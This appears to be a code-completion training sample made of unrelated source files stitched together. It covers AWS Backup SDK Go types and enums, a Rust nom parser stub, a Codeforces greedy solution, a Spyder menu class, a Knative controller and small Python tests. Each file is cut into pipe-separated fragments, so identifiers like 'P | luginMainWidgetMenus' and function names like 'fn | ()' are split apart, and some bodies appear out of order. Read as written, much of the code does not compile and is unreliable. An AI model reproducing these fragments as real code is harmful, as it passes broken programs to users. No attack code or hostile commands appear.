// The date and time a backup plan is updated, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version Ids cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s UpdateBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *UpdateBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *UpdateBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *UpdateBackupPlanOutput) SetBackupPlanArn(v string) *UpdateBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *UpdateBackupPlanOutput) SetBackupPlanId(v string) *UpdateBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *UpdateBackupPlanOutput) SetCreationDate(v time.Time) *UpdateBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *UpdateBackupPlanOutput) SetVersionId(v string) *UpdateBackupPlanOutput {
s.VersionId = &v
return s
}
type UpdateGlobalSettingsInput struct {
_ struct{} `type:"structure"`
// A list of resources along with the opt-in preferences for the account.
GlobalSettings map[string]*string `type:"map"`
}
// String returns the string representation
func (s UpdateGlobalSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateGlobalSettingsInput) GoString() string {
return s.String()
}
// SetGlobalSettings sets the GlobalSettings field's value.
func (s *UpdateGlobalSettingsInput) SetGlobalSettings(v map[string]*string) *UpdateGlobalSettingsInput {
s.GlobalSettings = v
return s
}
type UpdateGlobalSettingsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UpdateGlobalSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateGlobalSettingsOutput) GoString() string {
return s.String()
}
type UpdateRecoveryPointLifecycleInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s UpdateRecoveryPointLifecycleInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRecoveryPointLifecycleInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UpdateRecoveryPointLifecycleInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UpdateRecoveryPointLifecycleInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetBackupVaultName(v string) *UpdateRecoveryPointLifecycleInput {
s.BackupVaultName = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetLifecycle(v *Lifecycle) *UpdateRecoveryPointLifecycleInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetRecoveryPointArn(v string) *UpdateRecoveryPointLifecycleInput {
s.RecoveryPointArn = &v
return s
}
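// Illustrative sketch (an assumption, not generated code): a lifecycle update
// that satisfies the documented constraint that the "expire after days" value
// must be at least 90 days greater than the "transition to cold after days"
// value. The Lifecycle setters are assumed from this package's conventions;
// the vault name and ARN are placeholders.
func exampleLifecycleUpdate() *UpdateRecoveryPointLifecycleInput {
	return (&UpdateRecoveryPointLifecycleInput{}).
		SetBackupVaultName("a-backup-vault").
		SetRecoveryPointArn("arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45").
		SetLifecycle((&Lifecycle{}).
			SetMoveToColdStorageAfterDays(30).
			SetDeleteAfterDays(120)) // 120 >= 30 + 90, so the constraint holds
}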
type UpdateRecoveryPointLifecycleOutput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
}
// String returns the string representation
func (s UpdateRecoveryPointLifecycleOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRecoveryPointLifecycleOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetBackupVaultArn(v string) *UpdateRecoveryPointLifecycleOutput {
s.BackupVaultArn = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetCalculatedLifecycle(v *CalculatedLifecycle) *UpdateRecoveryPointLifecycleOutput {
s.CalculatedLifecycle = v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetLifecycle(v *Lifecycle) *UpdateRecoveryPointLifecycleOutput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetRecoveryPointArn(v string) *UpdateRecoveryPointLifecycleOutput {
s.RecoveryPointArn = &v
return s
}
type UpdateRegionSettingsInput struct {
_ struct{} `type:"structure"`
// Updates the list of services along with the opt-in preferences for the Region.
ResourceTypeOptInPreference map[string]*bool `type:"map"`
}
// String returns the string representation
func (s UpdateRegionSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRegionSettingsInput) GoString() string {
return s.String()
}
// SetResourceTypeOptInPreference sets the ResourceTypeOptInPreference field's value.
func (s *UpdateRegionSettingsInput) SetResourceTypeOptInPreference(v map[string]*bool) *UpdateRegionSettingsInput {
s.ResourceTypeOptInPreference = v
return s
}
type UpdateRegionSettingsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UpdateRegionSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRegionSettingsOutput) GoString() string {
return s.String()
}
// Contains metadata about a backup vault.
type VaultListMember struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a resource backup is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// The number of recovery points that are stored in a backup vault.
NumberOfRecoveryPoints *int64 `type:"long"`
}
// String returns the string representation
func (s VaultListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s VaultListMember) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *VaultListMember) SetBackupVaultArn(v string) *VaultListMember {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *VaultListMember) SetBackupVaultName(v string) *VaultListMember {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *VaultListMember) SetCreationDate(v time.Time) *VaultListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *VaultListMember) SetCreatorRequestId(v string) *VaultListMember {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *VaultListMember) SetEncryptionKeyArn(v string) *VaultListMember {
s.EncryptionKeyArn = &v
return s
}
// SetNumberOfRecoveryPoints sets the NumberOfRecoveryPoints field's value.
func (s *VaultListMember) SetNumberOfRecoveryPoints(v int64) *VaultListMember {
s.NumberOfRecoveryPoints = &v
return s
}
const (
// ConditionTypeStringequals is a ConditionType enum value
ConditionTypeStringequals = "STRINGEQUALS"
)
// ConditionType_Values returns all elements of the ConditionType enum
func ConditionType_Values() []string {
return []string{
ConditionTypeStringequals,
}
}
const (
// CopyJobStateCreated is a CopyJobState enum value
CopyJobStateCreated = "CREATED"
// CopyJobStateRunning is a CopyJobState enum value
CopyJobStateRunning = "RUNNING"
// CopyJobStateCompleted is a CopyJobState enum value
CopyJobStateCompleted = "COMPLETED"
// CopyJobStateFailed is a CopyJobState enum value
CopyJobStateFailed = "FAILED"
)
// CopyJobState_Values returns all elements of the CopyJobState enum
func CopyJobState_Values() []string {
return []string{
CopyJobStateCreated,
CopyJobStateRunning,
CopyJobStateCompleted,
CopyJobStateFailed,
}
}
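// Illustrative sketch (an assumption, not generated code): the Values()
// helpers defined in this file are convenient for validating user-supplied
// strings against an enum, for example:
func exampleIsValidCopyJobState(s string) bool {
	for _, v := range CopyJobState_Values() {
		if v == s {
			return true
		}
	}
	return false
}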
const (
// JobStateCreated is a JobState enum value
JobStateCreated = "CREATED"
// JobStatePending is a JobState enum value
JobStatePending = "PENDING"
// JobStateRunning is a JobState enum value
JobStateRunning = "RUNNING"
// JobStateAborting is a JobState enum value
JobStateAborting = "ABORTING"
// JobStateAborted is a JobState enum value
JobStateAborted = "ABORTED"
// JobStateCompleted is a JobState enum value
JobStateCompleted = "COMPLETED"
// JobStateFailed is a JobState enum value
JobStateFailed = "FAILED"
// JobStateExpired is a JobState enum value
JobStateExpired = "EXPIRED"
)
// JobState_Values returns all elements of the JobState enum
func JobState_Values() []string {
return []string{
JobStateCreated,
JobStatePending,
JobStateRunning,
JobStateAborting,
JobStateAborted,
JobStateCompleted,
JobStateFailed,
JobStateExpired,
}
}
const (
// RecoveryPointStatusCompleted is a RecoveryPointStatus enum value
RecoveryPointStatusCompleted = "COMPLETED"
// RecoveryPointStatusPartial is a RecoveryPointStatus enum value
RecoveryPointStatusPartial = "PARTIAL"
// RecoveryPointStatusDeleting is a RecoveryPointStatus enum value
RecoveryPointStatusDeleting = "DELETING"
// RecoveryPointStatusExpired is a RecoveryPointStatus enum value
RecoveryPointStatusExpired = "EXPIRED"
)
// RecoveryPointStatus_Values returns all elements of the RecoveryPointStatus enum
func RecoveryPointStatus_Values() []string {
return []string{
RecoveryPointStatusCompleted,
RecoveryPointStatusPartial,
RecoveryPointStatusDeleting,
RecoveryPointStatusExpired,
}
}
const (
// RestoreJobStatusPending is a RestoreJobStatus enum value
RestoreJobStatusPending = "PENDING"
// RestoreJobStatusRunning is a RestoreJobStatus enum value
RestoreJobStatusRunning = "RUNNING"
// RestoreJobStatusCompleted is a RestoreJobStatus enum value
RestoreJobStatusCompleted = "COMPLETED"
// RestoreJobStatusAborted is a RestoreJobStatus enum value
RestoreJobStatusAborted = "ABORTED"
// RestoreJobStatusFailed is a RestoreJobStatus enum value
RestoreJobStatusFailed = "FAILED"
)
// RestoreJobStatus_Values returns all elements of the RestoreJobStatus enum
func RestoreJobStatus_Values() []string {
return []string{
RestoreJobStatusPending,
RestoreJobStatusRunning,
RestoreJobStatusCompleted,
RestoreJobStatusAborted,
RestoreJobStatusFailed,
}
}
const (
// StorageClassWarm is a StorageClass enum value
StorageClassWarm = "WARM"
// StorageClassCold is a StorageClass enum value
StorageClassCold = "COLD"
// StorageClassDeleted is a StorageClass enum value
StorageClassDeleted = "DELETED"
)
// StorageClass_Values returns all elements of the StorageClass enum
func StorageClass_Values() []string {
return []string{
StorageClassWarm,
StorageClassCold,
StorageClassDeleted,
}
}
const (
// VaultEventBackupJobStarted is a VaultEvent enum value
VaultEventBackupJobStarted = "BACKUP_JOB_STARTED"
// VaultEventBackupJobCompleted is a VaultEvent enum value
VaultEventBackupJobCompleted = "BACKUP_JOB_COMPLETED"
// VaultEventBackupJobSuccessful is a VaultEvent enum value
VaultEventBackupJobSuccessful = "BACKUP_JOB_SUCCESSFUL"
// VaultEventBackupJobFailed is a VaultEvent enum value
VaultEventBackupJobFailed = "BACKUP_JOB_FAILED"
// VaultEventBackupJobExpired is a VaultEvent enum value
VaultEventBackupJobExpired = "BACKUP_JOB_EXPIRED"
// VaultEventRestoreJobStarted is a VaultEvent enum value
VaultEventRestoreJobStarted = "RESTORE_JOB_STARTED"
// VaultEventRestoreJobCompleted is a VaultEvent enum value
VaultEventRestoreJobCompleted = "RESTORE_JOB_COMPLETED"
// VaultEventRestoreJobSuccessful is a VaultEvent enum value
VaultEventRestoreJobSuccessful = "RESTORE_JOB_SUCCESSFUL"
// VaultEventRestoreJobFailed is a VaultEvent enum value
VaultEventRestoreJobFailed = "RESTORE_JOB_FAILED"
// VaultEventCopyJobStarted is a VaultEvent enum value
VaultEventCopyJobStarted = "COPY_JOB_STARTED"
// VaultEventCopyJobSuccessful is a VaultEvent enum value
VaultEventCopyJobSuccessful = "COPY_JOB_SUCCESSFUL"
// VaultEventCopyJobFailed is a VaultEvent enum value
VaultEventCopyJobFailed = "COPY_JOB_FAILED"
// VaultEventRecoveryPointModified is a VaultEvent enum value
VaultEventRecoveryPointModified = "RECOVERY_POINT_MODIFIED"
// VaultEventBackupPlanCreated is a VaultEvent enum value
VaultEventBackupPlanCreated = "BACKUP_PLAN_CREATED"
// VaultEventBackupPlanModified is a VaultEvent enum value
VaultEventBackupPlanModified = "BACKUP_PLAN_MODIFIED"
)
// VaultEvent_Values returns all elements of the VaultEvent enum
func VaultEvent_Values() []string {
return []string{
VaultEventBackupJobStarted,
VaultEventBackupJobCompleted,
VaultEventBackupJobSuccessful,
VaultEventBackupJobFailed,
VaultEventBackupJobExpired,
VaultEventRestoreJobStarted,
VaultEventRestoreJobCompleted,
VaultEventRestoreJobSuccessful,
VaultEventRestoreJobFailed,
VaultEventCopyJobStarted,
VaultEventCopyJobSuccessful,
VaultEventCopyJobFailed,
VaultEventRecoveryPointModified,
VaultEventBackupPlanCreated,
VaultEventBackupPlanModified,
}
} | } |
parser.rs | extern crate nom;
use nom::{
bytes::complete::{tag, take_while_m_n},
combinator::map_res,
sequence::tuple,
IResult,
};
pub fn execute(input: &str) | {
unimplemented!()
} |
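// Illustrative sketch (an assumption, not the original body): the imports
// above are exactly those used in nom's well-known hex-colour example, so
// `execute` was likely meant to drive a parser along these lines.
fn from_hex(input: &str) -> Result<u8, std::num::ParseIntError> {
    u8::from_str_radix(input, 16)
}
fn is_hex_digit(c: char) -> bool {
    c.is_digit(16)
}
// Parses two hex digits into a byte, e.g. "2F" -> 47.
fn hex_primary(input: &str) -> IResult<&str, u8> {
    map_res(take_while_m_n(2, 2, is_hex_digit), from_hex)(input)
}
// Parses a colour like "#2F14DF" into its (r, g, b) components.
fn hex_color(input: &str) -> IResult<&str, (u8, u8, u8)> {
    let (input, _) = tag("#")(input)?;
    let (input, rgb) = tuple((hex_primary, hex_primary, hex_primary))(input)?;
    Ok((input, rgb))
}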
|
cf1426D_non_zero_segments.rs | // Vicfred & uninhm
// https://codeforces.com/contest/1426/problem/D
// greedy
use std::io::stdin;
use std::collections::BTreeSet;
fn | () {
let mut line = String::new();
stdin().read_line(&mut line).unwrap();
let n: i64 = line.trim().parse().unwrap();
line = String::new();
stdin().read_line(&mut line).unwrap();
let a: Vec<i64> = line
.split_whitespace()
.map(|x| x.parse().unwrap())
.collect();
    // Prefix sums seen since the last insertion; a repeated prefix sum means
    // some contiguous segment sums to zero, so a number must be inserted.
    let mut rbt = BTreeSet::new();
    let mut prefix: i64 = 0;
    let mut ans: i64 = 0;
    rbt.insert(0);
for x in a {
prefix += x;
if rbt.contains(&prefix) {
ans += 1;
rbt.clear();
rbt.insert(0);
prefix = x;
}
rbt.insert(prefix);
}
println!("{}", ans);
}
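// Worked example (illustrative): for a = [1, -1, 2] the running prefix sums
// are 1, 0, 2. The prefix 0 repeats the initial 0, so one number must be
// inserted between the second and third elements, giving the answer 1.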
| main |
test_ai.py | import pytest
from katrain.core.constants import AI_STRATEGIES_RECOMMENDED_ORDER, AI_STRATEGIES
class TestAI:
def test_order(self):
| assert set(AI_STRATEGIES_RECOMMENDED_ORDER) == set(AI_STRATEGIES) |
|
controller.go | /*
Copyright 2021 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by injection-gen. DO NOT EDIT.
package broker
import (
context "context"
fmt "fmt"
reflect "reflect"
strings "strings"
versionedscheme "github.com/google/knative-gcp/pkg/client/clientset/versioned/scheme"
client "github.com/google/knative-gcp/pkg/client/injection/client"
broker "github.com/google/knative-gcp/pkg/client/injection/informers/broker/v1beta1/broker"
zap "go.uber.org/zap"
corev1 "k8s.io/api/core/v1"
labels "k8s.io/apimachinery/pkg/labels"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
scheme "k8s.io/client-go/kubernetes/scheme"
v1 "k8s.io/client-go/kubernetes/typed/core/v1"
record "k8s.io/client-go/tools/record"
kubeclient "knative.dev/pkg/client/injection/kube/client"
controller "knative.dev/pkg/controller"
logging "knative.dev/pkg/logging"
logkey "knative.dev/pkg/logging/logkey"
reconciler "knative.dev/pkg/reconciler"
)
const (
defaultControllerAgentName = "broker-controller"
defaultFinalizerName = "brokers.eventing.knative.dev"
// ClassAnnotationKey points to the annotation for the class of this resource.
ClassAnnotationKey = "eventing.knative.dev/broker.class"
)
// NewImpl returns a controller.Impl that handles queuing and feeding work from
// the queue through an implementation of controller.Reconciler, delegating to
// the provided Interface and optional Finalizer methods. OptionsFn is used to return
// controller.Options to be used by the internal reconciler.
func | (ctx context.Context, r Interface, classValue string, optionsFns ...controller.OptionsFn) *controller.Impl {
logger := logging.FromContext(ctx)
	// Check the number of options functions passed in; at most one is supported.
if len(optionsFns) > 1 {
logger.Fatal("Up to one options function is supported, found: ", len(optionsFns))
}
brokerInformer := broker.Get(ctx)
lister := brokerInformer.Lister()
rec := &reconcilerImpl{
LeaderAwareFuncs: reconciler.LeaderAwareFuncs{
PromoteFunc: func(bkt reconciler.Bucket, enq func(reconciler.Bucket, types.NamespacedName)) error {
all, err := lister.List(labels.Everything())
if err != nil {
return err
}
for _, elt := range all {
// TODO: Consider letting users specify a filter in options.
enq(bkt, types.NamespacedName{
Namespace: elt.GetNamespace(),
Name: elt.GetName(),
})
}
return nil
},
},
Client: client.Get(ctx),
Lister: lister,
reconciler: r,
finalizerName: defaultFinalizerName,
classValue: classValue,
}
ctrType := reflect.TypeOf(r).Elem()
ctrTypeName := fmt.Sprintf("%s.%s", ctrType.PkgPath(), ctrType.Name())
ctrTypeName = strings.ReplaceAll(ctrTypeName, "/", ".")
logger = logger.With(
zap.String(logkey.ControllerType, ctrTypeName),
zap.String(logkey.Kind, "eventing.knative.dev.Broker"),
)
impl := controller.NewImpl(rec, logger, ctrTypeName)
agentName := defaultControllerAgentName
// Pass impl to the options. Save any optional results.
for _, fn := range optionsFns {
opts := fn(impl)
if opts.ConfigStore != nil {
rec.configStore = opts.ConfigStore
}
if opts.FinalizerName != "" {
rec.finalizerName = opts.FinalizerName
}
if opts.AgentName != "" {
agentName = opts.AgentName
}
if opts.SkipStatusUpdates {
rec.skipStatusUpdates = true
}
if opts.DemoteFunc != nil {
rec.DemoteFunc = opts.DemoteFunc
}
}
rec.Recorder = createRecorder(ctx, agentName)
return impl
}
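// Illustrative sketch (an assumption, not generated code): a typical
// constructor would call NewImpl with a reconciler implementing Interface
// and, optionally, a single options function. The class value and the option
// shown here are placeholders; the Options fields are the ones read above.
//
//	func NewController(ctx context.Context, r Interface) *controller.Impl {
//		return NewImpl(ctx, r, "googlecloud", func(impl *controller.Impl) controller.Options {
//			return controller.Options{FinalizerName: "my-custom-finalizer"}
//		})
//	}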
func createRecorder(ctx context.Context, agentName string) record.EventRecorder {
logger := logging.FromContext(ctx)
recorder := controller.GetEventRecorder(ctx)
if recorder == nil {
// Create event broadcaster
logger.Debug("Creating event broadcaster")
eventBroadcaster := record.NewBroadcaster()
watches := []watch.Interface{
eventBroadcaster.StartLogging(logger.Named("event-broadcaster").Infof),
eventBroadcaster.StartRecordingToSink(
&v1.EventSinkImpl{Interface: kubeclient.Get(ctx).CoreV1().Events("")}),
}
recorder = eventBroadcaster.NewRecorder(scheme.Scheme, corev1.EventSource{Component: agentName})
go func() {
<-ctx.Done()
for _, w := range watches {
w.Stop()
}
}()
}
return recorder
}
func init() {
versionedscheme.AddToScheme(scheme.Scheme)
}
| NewImpl |
menus.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder API menu widgets.
"""
# Standard library imports
import sys
from typing import Optional, Union, TypeVar
# Third party imports
from qtpy.QtWidgets import QAction, QMenu
# Local imports
from spyder.utils.qthelpers import add_actions, SpyderAction
# --- Constants
# ----------------------------------------------------------------------------
MENU_SEPARATOR = None
# Generic type annotations
T = TypeVar('T', bound='SpyderMenu')
class OptionsMenuSections:
Top = 'top_section'
Bottom = 'bottom_section'
class P |
Context = 'context_menu'
Options = 'options_menu'
# --- Widgets
# ----------------------------------------------------------------------------
class SpyderMenu(QMenu):
"""
A QMenu subclass to implement additional functionality for Spyder.
"""
MENUS = []
def __init__(self, parent=None, title=None, dynamic=True,
menu_id=None):
self._parent = parent
self._title = title
self._sections = []
self._actions = []
self._actions_map = {}
self.unintroduced_actions = {}
self.unintroduced_sections = []
self._dirty = False
self.menu_id = menu_id
if title is None:
super().__init__(parent)
else:
super().__init__(title, parent)
self.MENUS.append((parent, title, self))
if sys.platform == 'darwin' and dynamic:
# Needed to enable the dynamic population of actions in menus
# in the aboutToShow signal
# See spyder-ide/spyder#14612
self.addAction(QAction(self))
self.aboutToShow.connect(self._render)
def clear_actions(self):
"""
Remove actions from the menu (including custom references)
Returns
-------
None.
"""
self.clear()
self._sections = []
self._actions = []
self._actions_map = {}
self.unintroduced_actions = {}
self.unintroduced_sections = []
def add_action(self: T, action: Union[SpyderAction, T],
section: Optional[str] = None,
before: Optional[str] = None,
before_section: Optional[str] = None,
check_before: bool = True,
omit_id: bool = False):
"""
Add action to a given menu section.
Parameters
----------
action: SpyderAction
The action to add.
section: str or None
The section id in which to insert the `action`.
before: str
Make the action appear before the given action identifier.
before_section: str or None
Make the item section (if provided) appear before another
given section.
check_before: bool
Check if the `before` action is part of the menu. This is
necessary to avoid an infinite recursion when adding
unintroduced actions with this method again.
omit_id: bool
            If True, skip checking that the item to add declares an id.
            This flag exists only for items added by Spyder 4 plugins.
            Default: False
"""
item_id = None
if isinstance(action, SpyderAction) or hasattr(action, 'action_id'):
item_id = action.action_id
elif isinstance(action, SpyderMenu) or hasattr(action, 'menu_id'):
item_id = action.menu_id
if not omit_id and item_id is None and action is not None:
raise AttributeError(f'Item {action} must declare an id.')
if before is None:
self._actions.append((section, action))
else:
new_actions = []
added = False
before_item = self._actions_map.get(before, None)
for sec, act in self._actions:
if before_item is not None and act == before_item:
added = True
new_actions.append((section, action))
new_actions.append((sec, act))
# Actions can't be added to the menu if the `before` action is
# not part of it yet. That's why we need to save them in the
# `unintroduced_actions` dict, so we can add them again when
# the menu is rendered.
if not added and check_before:
before_actions = self.unintroduced_actions.get(before, [])
before_actions.append((section, action))
self.unintroduced_actions[before] = before_actions
self._actions = new_actions
if before_section is not None:
if before_section in self._sections:
self._update_sections(section, before_section)
else:
# If `before_section` has not been introduced yet to the menu,
# we save `section` to introduce it when the menu is rendered.
if (section, before_section) not in self.unintroduced_sections:
self.unintroduced_sections.append(
(section, before_section)
)
elif section not in self._sections:
self._sections.append(section)
# Track state of menu to avoid re-rendering if menu has not changed
self._dirty = True
self._actions_map[item_id] = action
def get_title(self):
"""
Return the title for menu.
"""
return self._title
def get_actions(self):
"""
Return a parsed list of menu actions.
Includes MENU_SEPARATOR taking into account the sections defined.
"""
actions = []
for section in self._sections:
for (sec, action) in self._actions:
if sec == section:
actions.append(action)
actions.append(MENU_SEPARATOR)
return actions
def get_sections(self):
"""
Return a tuple of menu sections.
"""
return tuple(self._sections)
def _render(self):
"""
Create the menu prior to showing it. This takes into account sections
and location of menus.
"""
if self._dirty:
self.clear()
# Iterate over unintroduced sections until all of them have been
# introduced.
iter_sections = iter(self.unintroduced_sections)
while len(self.unintroduced_sections) > 0:
section, before_section = next(iter_sections)
self._update_sections(section, before_section)
# If section was introduced, remove it from the list and
# update iterator.
if section in self._sections:
self.unintroduced_sections.remove(
(section, before_section)
)
iter_sections = iter(self.unintroduced_sections)
# Update actions with those that were not introduced because
# a `before` action they required was not part of the menu yet.
for before, actions in self.unintroduced_actions.items():
for section, action in actions:
self.add_action(action, section=section,
before=before, check_before=False)
actions = self.get_actions()
add_actions(self, actions)
self._dirty = False
def _update_sections(self, section, before_section):
"""Update sections ordering."""
new_sections = []
for sec in self._sections:
if sec == before_section:
new_sections.append(section)
if sec != section:
new_sections.append(sec)
self._sections = new_sections
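def _example_spyder_menu(parent=None):
    """Illustrative sketch (an assumption, not part of the Spyder API):
    populate a SpyderMenu using sections; ``omit_id=True`` allows plain
    QActions, which do not declare an ``action_id``.
    """
    menu = SpyderMenu(parent=parent, title='Example', menu_id='example_menu')
    open_action = QAction('Open', menu)
    close_action = QAction('Close', menu)
    # Actions sharing a section are grouped together; separators are added
    # between sections when the menu is rendered.
    menu.add_action(open_action, section='file_ops', omit_id=True)
    menu.add_action(close_action, section='file_ops', omit_id=True)
    return menu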
class MainWidgetMenu(SpyderMenu):
"""
This menu fixes the bottom section of the options menu.
"""
def _render(self):
"""
Create the menu prior to showing it. This takes into account sections
and location of menus. It also hides consecutive separators if found.
"""
if self._dirty:
self.clear()
bottom = OptionsMenuSections.Bottom
actions = []
for section in self._sections:
for (sec, action) in self._actions:
if sec == section and sec != bottom:
actions.append(action)
actions.append(MENU_SEPARATOR)
# Add bottom actions
for (sec, action) in self._actions:
if sec == bottom:
actions.append(action)
add_actions(self, actions)
self._dirty = False
| luginMainWidgetMenus: |
alphabet_subsequence.py |
def alphabet_subsequence_two(s):
""" I like this solution better.
Clear and concise
"""
    return all(s[i] < s[i + 1] for i in range(len(s) - 1))
if __name__ == '__main__':
s = 'effg'
print(alphabet_subsequence(s)) | def alphabet_subsequence(s):
return ''.join(sorted(s)) == s and len(set(s)) == len(s)
|
|
specs_test.py | # Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for specs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Internal dependencies.
